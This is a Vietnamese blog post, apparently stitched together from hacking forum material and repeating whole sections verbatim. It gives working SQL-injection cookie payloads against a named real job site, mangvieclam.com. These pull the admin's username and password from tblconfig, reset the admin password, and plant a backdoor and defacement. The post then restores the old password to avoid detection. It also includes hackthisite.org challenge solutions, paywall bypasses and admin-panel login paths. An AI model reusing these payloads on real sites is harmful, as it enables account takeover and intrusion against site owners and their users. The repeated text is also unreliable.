Hack webs
Hack một trang web bất kỳ
HTML
Code:
<form action=http://www.mangvieclam.com/log.asp method=post>
username: <input type=text name=username><br>
password: <input type=password name=password><br>
<input type=hidden name=ChoseLogin value=3>
<input type=hidden name=mod value=1>
<input type=submit value=login>
</form>
Upload backdoor và thay đổi trang index.asp. Sau đó restore lại pasword cũ cho admin để tránh bị phát hiện:
javascript:void(document.cookie="username="+escape ("';update tblconfig set adminpass='...' where accid=1--"))
Một giải pháp cho mangvieclam.com là bạn nên chuyển biến Request.Cookies("UserName") thành biến phiên Session("UserName") để tránh bị giả mạo username như ở trên.
Tìm trang administrator panel của trang web
Truy cập trang web cần tìm nhưng đáng ghét site đó lại yêu cầu phải đăng ký tài khoản của trang hoặc mua một sản phẩm nào đó của nómới có thể xem nội dung. Vậy bạn làm sao để giải quyết rắc rối này?
Khi bạn cần tìm kiếm những thông tin từ Internet, thì Google luôn là trang tìm kiếm đầu tiên mà bạn nghĩ đến. Tuy nhiên, vấn đề đặt ra ở đây là đôi khi, bạn đã tìm được kết quả ưng ý, nhưng lại không thể xem nội dung của trang web đó bởi vì nó yêu cầu bạn phải … đăng ký mới có thể xem nội dung (tình trạng này đặc biệt xảy ra đối với những kết quả tìm kiếm là các forum).
Vấn đề này xem chừng là phá rườm rà bởi vì để đăng ký một tài khoản trên 1 trang web mà bạn không chắc chắn về độ tin cậy của nó thì hẳn là một điều không nên. Vậy thì bạn bị đặt vào tình cảnh, hoặc là bỏ qua trang web có tài liệu mà bạn cần tìm, hoặc là phải mất thời gian (và có thể là mất cả sự an toàn) để đăng ký 1 tài khoản trên trang web đó để có thể tiếp tục truy cập vào trang web. Thậm chí, có một số website còn yêu cầu bạn phải trả một khoản phí mới được phép đăng ký vào site.
Tuy nhiên, có những cách thức đơn giản hơn rất nhiều, để bạn không cần phải mất thời gian đăng ký vào trang web mà vẫn có thể có tiếp tục truy cập vào trang web để xem nội dung. Bài viết sau đây sẽ hướng dẫn 3 phương pháp.
1. Bug Me Not
Bug Not Me là một tiện ích tuyệt vời giúp bạn giải quyết vấn đề trên. Khi gặp một trang web yêu cầu bạn phải đăng nhập mới có thể sử dụng, bạn chỉ cần truy cập vào trang webhttp://www.bugmenot.com/, sau đó, dán link của trang web mà bạn gặp vấn đề về đăng nhập vào khung và click vào Get Logins. Bug Me Not sẽ cung cấp cho bạn 1 tài khoản bao gồm tên đăng nhập và tài khoản của trang web đó để bạn có thể sử dụng ngay.
Còn nếu như bạn sử dụng trình duyệt web Firefox thì Bug Not Me sẽ cung cấp cho bạn 1 add-on cùng tên. Bạn có thể download add-on này tại địa chỉ :https://addons.mozilla.org/en-US/firefox/addon/6349
Sau khi cài đặt add-on này vào Firefox, mỗi khi cần phải đăng nhập vào một trang web nào đó yêu cầu đăng nhập, bạn chỉ cần click chuột phải vào khung đăng nhập và chọn Login with Bug Me Not, lập tức user name và password của một tài khoản bất kỳ trong trang web đó sẽ tự động điền vào khung đăng nhập để bạn có thể sử dụng.
Tuy nhiên không phải lúc nào cũng có được kết quả ưng ý cho sự tìm kiếm của bạn. Trong trường hợp đó, bạn hãy tiếp tục thử những cách thức dưới đây.
2. Sử dụng Cache của Google
Thông thường, mỗi khi một trang web nào được lưu lại vào cơ sở dữ liệu của bộ máy tìm kiếm Google, nó cũng sẽ được lưu vào lên server của Google dưới dạng các Cache. Khi này nội dung của trang web về cơ bản là thuộc về server của Google chứ không còn thuộc về server của trang web sở hữu kia nữa.
Trong trường hợp này, khi bạn tìm thấy một kết quả ưng ý trên Google, việc của bạn là click vào đường link “Đã lưu trong bộ nhớ Cache” ở dưới mỗi đường link kết quả. Bây giờ, nội dung của trang web sẽ được hiển thị bất kể bạn đã đăng nhập vào trang web đó hay chưa.
3. Be the Bot
Những trang tìm kiếm như Google hoặc Yahoo thường sử dụng những con bot tự động của mình để truy cập vào mọi trang web để từ đó lấy thông tin sự những sự tìm kiếm của mình. Và những trang web mà những bot của Yahoo hoặc Google truy cập vào thì cho phép những “con sâu” này len lõi vào tận ngóc ngách của trang web mà không cần bất kỳ một sự đăng ký hay đăng nhập nào. Và cách thức hoạt động của Be the Bot là giả vờ đưa bạn trở thành một bot tự động của Google hoặc Yahoo để rồi từ đó bạn có thể thoải mái truy cập và xem nội dung của một trang web, bất chấp việc trang web đó có bắt buộc phải đăng nhập hay không.
Việc đầu tiên của bạn là truy cập vào trang webhttp://www.avivadirectory.com/bethebot/, sau đó, điền đường dẫn của trang web mà bạn muốn truy cập vào hộp thoại url, chọn định dạng bot mà bạn muốn giả dạng (bot của Google hoặc Yahoo), sau đó nhấn Go. Lập tức ngay bên dưới trang web sẽ xuất hiện cửa sổ nhỏ, đó chính là nội dung của trang web mà bạn cần truy cập. Bây giờ bạn có thể tự do thoải mái đi lại ngay trong trang web này mà không gặp bất kỳ một sự khó khăn hay cản trở nào.
Những thủ thuật trên xem chừng rất đơn giản, tuy nhiên, đối với những người… lười đăng ký tài khoản hoặc những người không muốn mạo hiểm thông tin cá nhân của mình cho một điều không chắc chắn thì hẳn nhiên nó sẽ rất hữu ích.
Hoặc phương pháp 2:
Hack bất cứ một trang web bất kỳ
Bài 1:
Đầu tiên bạn mở trang web victim lên !
Vào thanh Address chứa link trang web victim xóa sạch link , copy và pase vào đoạn code sau vào :
Code:
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
Và bây giờ bạn có thể làm gì trang web của victim cũng đc , thao tác như notepad
Và bằng chứng microsoft bị phá hủy trong nháy mắt
Hiiiii anh em làm xong đừng nóng !
bổ sung thêm cái Hack Web Bằng JavaScript-Inline
[SANITC] : Trong bài viết này mình sẽ giới thiệu với các bạn về kĩ thuật hack web chỉ dùng JavaScript. Với kĩ thuật này, bạn có thể xem xét và hiệu chỉnh giá trị của các cookie hoặc trường ẩn trực tiếp ngay trên trang web. Tất cả chỉ với một trình duyệt web hổ trợ "debug javascript-inline", chẳng hạn như Internet Explorer, Netscape hay Mozilla, ... Cơ bản về JavaScript-Inline^^
Đa số các trình duyệt web đều hổ trợ JavaScript-Inline.
Bạn có thể thi hành JavaScript bằng cách gõ vào thanh URL như sau:
Code:
javascript:void(<đặt lệnh JavaScritpt ngay tại đây!>)
Ví dụ:
Để xem giá trị hiện tại của cookie bạn gõ :
Code:
javascript:alert(document.cookie)
Hoặc
để thay đổi giá trị của trường ẩn "hiddenid" của form đầu tiên thành "2", bạn gõ:
Code:
javascript:void(document.forms[0].hiddenid.value="2")
Mã nguồn HTML có đoạn như sau:
... Code:
var a=unescape("%43%4f%44%45%5a");
function check()
{
if (document.a.c.value == a)
{
document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";
}
else
{
alert ("wrong! - letter size?");
}
}
}
Đơn giản bạn có thể gõ thẳng vào thanh URL của IE như sau:
Code:
javascript:alert(unescape(a)) để lấy password của level tiếp theo
("CODEZ")
Realistic mission 8 trên hackthisite.org yêu cầu bạn chuyển 10 triệu đô từ tài khoản của "Gary Hunter" vào tài khoản "dropCash".
Sau khi bạn dùng SQL-Injection để lấy username của "Gary Hunter", bạn tiến hành chuyển tiền như sau:
Đăng nhập vào tài khoản của bạn. Trên thanh URL của IE bạn gõ vào:
Code:
javascript:void(document.write('
< name="the_" ="movemoney.php" method="post"><
value="GaryWilliamHunter" name="FROM" ="">< value="dropCash"
name="TO" ="">< value="10000000" name="AMOUNT" =""><
value="Move Money To A Different Account" ="submit">'))
Đoạn JavaScript trên sẽ tạo một form với trường ẩn
Code:
FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000
Bây giờ bạn thay đổi cookie lại như sau:
Code:
javascript:void(document.cookie="accountUsername=G aryWilliamHunter")
javascript:void(document.cookie="accountPassword=G aryWilliamHunter")
Ấn nút "Move Money To A Different Account" một cái là xong.
Mình nghĩ rất có khả năng là mission 8 tạo một session("LoggedIn").
Mỗi lần chúng ta đăng nhập vào nó sẽ đặt session("LoggedIn")=1. Chúng ta chỉ cần thay đổi lại giá trị của cookie và trường ẩn để thực hiện việc chuyển tiền trong session của chúng ta
vì nó chỉ kiểm tra sesion("LoggedIn")=1 mà không kiểm tra username thực sự là ai.
Ví dụ cuối cùng, mình sẽ trình bày về cách hack trang web
Mình đã gởi lời nhắn cho admin của mangvieclam.com nhưng chẳng thấy liên lạc với mình để fix lỗi. Hihi, cái "message" của mình ở cuối trang index.asp trên mangvieclam.com chưa thấy ai xóa hết.
Sau khi đã đăng nhập vào mangvieclam.com, bạn gõ vào thanh URL dòng javascript:alert(document.cookie) để xem cookie.
Ban có thể thay đổi thông tin cá nhân của một user bất kì trên mangvieclam.com bằng cách đổi lại cookie username như sau: javascript:void(document.cookie="username=tên user"), sau đó chọn mục "Cập nhập thông tin"
Bạn cũng có thể thay đổi password của một user bất kì trên mangvieclam.com sau khi đã login vào với account của mình như sau: chọn mục "Thay đổi mật khẩu", gõ dòng javascript:void(document.cookie="username=tên user"+escape("' or '1'='1")) vào thanh URL, nhập password cũ là gì cũng được và password mới, sau đó ấn nút "Thay đổi mật khẩu".
Lỗi này nằm trong file icl/filerec/detail.asp, dòng thứ 43..65. Ví dụ, khi bạn set cookie username là "trungkien' or '1'='1", các câu lệnh SQL sau sẽ được thực thi:
Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1' And Passwords='md5(password cũ sai)' And Active = 1982 // luôn trả về true do điều kiện or '1'='1' đúng mặc dù password cũ sai
Update tblUserInfo Set Passwords = 'md5(password mới)' Where UserID = 'trungkien' or '1'='1' And Active = 1982 // luôn set password mới cho user "trungkien" do điều kiện UserID = 'trungkien' đúng trước điều kiện '1'='1'
Rất tiếc là lỗi này không thể khai thác trên
LINK :http://www.mangvieclam.com/
do lỗi lập trình.
Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien' or '1'='1' And Passwords = N'...' And Active = 1982
Tuy nhiên, website
LINK :http://www.mangvieclam.com/
dùng CSDL MS-SQL nên mình dễ dàng lấy được username và password của admin từ tblConfig như sau:
Đầu tiên mình lấy username bằng javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminid from tblconfig where accid=1))--"))
Chọn mục "Cập nhập thông tin"
Tên đăng nhâp của admin là 'ngtuan'
Tương tự mình lấy password của admin bằng Code:
javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminpass from tblconfig where accid=1))--"))
Bây giờ mình đặt lại password mới là 'hacked'
Vào thanh Address chứa link trang web victim xóa sạch link , copy và pase vào đoạn code sau vào :
Code:
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
Và bây giờ bạn có thể làm gì trang web của victim cũng đc , thao tác như notepad
Và bằng chứng microsoft bị phá hủy trong nháy mắt
Hiiiii anh em làm xong đừng nóng !
bổ sung thêm cái Hack Web Bằng JavaScript-Inline
[SANITC] : Trong bài viết này mình sẽ giới thiệu với các bạn về kĩ thuật hack web chỉ dùng JavaScript. Với kĩ thuật này, bạn có thể xem xét và hiệu chỉnh giá trị của các cookie hoặc trường ẩn trực tiếp ngay trên trang web. Tất cả chỉ với một trình duyệt web hổ trợ "debug javascript-inline", chẳng hạn như Internet Explorer, Netscape hay Mozilla, ... Cơ bản về JavaScript-Inline^^
Đa số các trình duyệt web đều hổ trợ JavaScript-Inline.
Bạn có thể thi hành JavaScript bằng cách gõ vào thanh URL như sau:
Code:
javascript:void(<đặt lệnh JavaScritpt ngay tại đây!>)
Ví dụ:
Để xem giá trị hiện tại của cookie bạn gõ :
Code:
javascript:alert(document.cookie)
Hoặc
để thay đổi giá trị của trường ẩn "hiddenid" của form đầu tiên thành "2", bạn gõ:
Code:
javascript:void(document.forms[0].hiddenid.value="2")
Mã nguồn HTML có đoạn như sau:
... Code:
var a=unescape("%43%4f%44%45%5a");
function check()
{
if (document.a.c.value == a)
{
document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";
}
else
{
alert ("wrong! - letter size?");
}
}
}
Đơn giản bạn có thể gõ thẳng vào thanh URL của IE như sau:
Code:
javascript:alert(unescape(a)) để lấy password của level tiếp theo
("CODEZ")
Realistic mission 8 trên hackthisite.org yêu cầu bạn chuyển 10 triệu đô từ tài khoản của "Gary Hunter" vào tài khoản "dropCash".
Sau khi bạn dùng SQL-Injection để lấy username của "Gary Hunter", bạn tiến hành chuyển tiền như sau:
Đăng nhập vào tài khoản của bạn. Trên thanh URL của IE bạn gõ vào:
Code:
javascript:void(document.write('
< name="the_" ="movemoney.php" method="post"><
value="GaryWilliamHunter" name="FROM" ="">< value="dropCash"
name="TO" ="">< value="10000000" name="AMOUNT" =""><
value="Move Money To A Different Account" ="submit">'))
Đoạn JavaScript trên sẽ tạo một form với trường ẩn
Code:
FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000
Bây giờ bạn thay đổi cookie lại như sau:
Code:
javascript:void(document.cookie="accountUsername=G aryWilliamHunter")
javascript:void(document.cookie="accountPassword=G aryWilliamHunter")
Ấn nút "Move Money To A Different Account" một cái là xong.
Mình nghĩ rất có khả năng là mission 8 tạo một session("LoggedIn").
Mỗi lần chúng ta đăng nhập vào nó sẽ đặt session("LoggedIn")=1. Chúng ta chỉ cần thay đổi lại giá trị của cookie và trường ẩn để thực hiện việc chuyển tiền trong session của chúng ta
vì nó chỉ kiểm tra sesion("LoggedIn")=1 mà không kiểm tra username thực sự là ai.
Ví dụ cuối cùng, mình sẽ trình bày về cách hack trang web
Mình đã gởi lời nhắn cho admin của mangvieclam.com nhưng chẳng thấy liên lạc với mình để fix lỗi. Hihi, cái "message" của mình ở cuối trang index.asp trên mangvieclam.com chưa thấy ai xóa hết.
Sau khi đã đăng nhập vào mangvieclam.com, bạn gõ vào thanh URL dòng javascript:alert(document.cookie) để xem cookie.
Ban có thể thay đổi thông tin cá nhân của một user bất kì trên mangvieclam.com bằng cách đổi lại cookie username như sau: javascript:void(document.cookie="username=tên user"), sau đó chọn mục "Cập nhập thông tin"
Bạn cũng có thể thay đổi password của một user bất kì trên mangvieclam.com sau khi đã login vào với account của mình như sau: chọn mục "Thay đổi mật khẩu", gõ dòng javascript:void(document.cookie="username=tên user"+escape("' or '1'='1")) vào thanh URL, nhập password cũ là gì cũng được và password mới, sau đó ấn nút "Thay đổi mật khẩu".
Lỗi này nằm trong file icl/filerec/detail.asp, dòng thứ 43..65. Ví dụ, khi bạn set cookie username là "trungkien' or '1'='1", các câu lệnh SQL sau sẽ được thực thi:
Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1' And Passwords='md5(password cũ sai)' And Active = 1982 // luôn trả về true do điều kiện or '1'='1' đúng mặc dù password cũ sai
Update tblUserInfo Set Passwords = 'md5(password mới)' Where UserID = 'trungkien' or '1'='1' And Active = 1982 // luôn set password mới cho user "trungkien" do điều kiện UserID = 'trungkien' đúng trước điều kiện '1'='1'
Rất tiếc là lỗi này không thể khai thác trên
LINK :http://www.mangvieclam.com/
do lỗi lập trình.
Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien' or '1'='1' And Passwords = N'...' And Active = 1982
Tuy nhiên, website
LINK :http://www.mangvieclam.com/
dùng CSDL MS-SQL nên mình dễ dàng lấy được username và password của admin từ tblConfig như sau:
Đầu tiên mình lấy username bằng javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminid from tblconfig where accid=1))--"))
Chọn mục "Cập nhập thông tin"
Tên đăng nhâp của admin là 'ngtuan'
Tương tự mình lấy password của admin bằng Code:
javascript:void(document.cookie="username="+escape ("' or 1=convert(int,(select adminpass from tblconfig where accid=1))--"))
Bây giờ mình đặt lại password mới là 'hacked'
HTML
Code:
<form action=http://www.mangvieclam.com/log.asp method=post>
username: <input type=text name=username><br>
password: <input type=password name=password><br>
<input type=hidden name=ChoseLogin value=3>
<input type=hidden name=mod value=1>
<input type=submit value=login>
</form>
Upload backdoor và thay đổi trang index.asp. Sau đó restore lại pasword cũ cho admin để tránh bị phát hiện:
javascript:void(document.cookie="username="+escape ("';update tblconfig set adminpass='...' where accid=1--"))
Một giải pháp cho mangvieclam.com là bạn nên chuyển biến Request.Cookies("UserName") thành biến phiên Session("UserName") để tránh bị giả mạo username như ở trên.
Đăng nhập vào hệ thống web
Dung tool tim kiem: Web Admin Finder v2.0
Đối với web nhà trường:
http://địa chỉ website nhà trường/Login.aspx.
Vd:
Đối với trang web bất kỳ:
Mỗi web điều có địa chỉ Điền địa chỉ Control Panel. Tìm địa chỉ control panel là địa chỉ đăng nhập quảng lý web
Đăng nhập hệ thống
- Liên kết trang quản trị: http://domainname/administrator/index.aspx
o domainname: là tên website của bạn ( ví dụ: vinnonet.com,…)
- User name: xxxxxxxxxxx
- Password: xxxxxxxxxxx
hoặc: đăng nhập vào phần quản lý website theo đường dẫn sau: www.ten_mien_cua_ban/manage.php
Ví dụ tên miền của bạn là abcd.com thì bạn truy cập theo địa chỉ: www.abcd.com/manage.php
Bạn đăng nhập vào hệ thống với Địa chỉ email và Mật khẩu mà bạn đã được cấp.
0 nhận xét:
Post a Comment